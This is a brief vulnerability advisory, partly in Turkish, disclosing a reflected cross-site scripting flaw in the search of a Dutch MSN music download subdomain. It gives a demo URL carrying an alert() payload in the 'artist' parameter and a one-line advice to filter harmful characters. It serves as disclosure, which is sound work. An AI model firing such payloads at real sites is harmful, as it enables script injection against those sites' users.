#############################################################
MSN.com XSS Vulnerability
#############################################################

# Author : SOLVER ~ LOJISTIK GRUP

# Name : MSN Music Download Subdomain

# Bug Type : XSS (Cross Site Scripting)

# Infection : Hedef sistem uzerinde zararli Javascript kodlari calistirilabilir.

# Explanation : muziek.downloaden.nl.msn.com sitesi uzerinde bulunan arama motorunda zararli kodlar calistirmaya yarayan bir bugdur.

# Example Exploit : “>“>alert(/solver/)

[+] Site: muziek.downloaden.nl.msn.com

[+] Demo: http://muziek.downloaden.nl.msn.com/artist.php?artist=“>“>alert(/solver/)

[+] Proof: [IMG]http://imagesturk.net/images/5m02c.jpg[/IMG]

# Bug Fix Advice : Zararli Karakterler Daha Iyi Filtrenmelidir.
#############################################################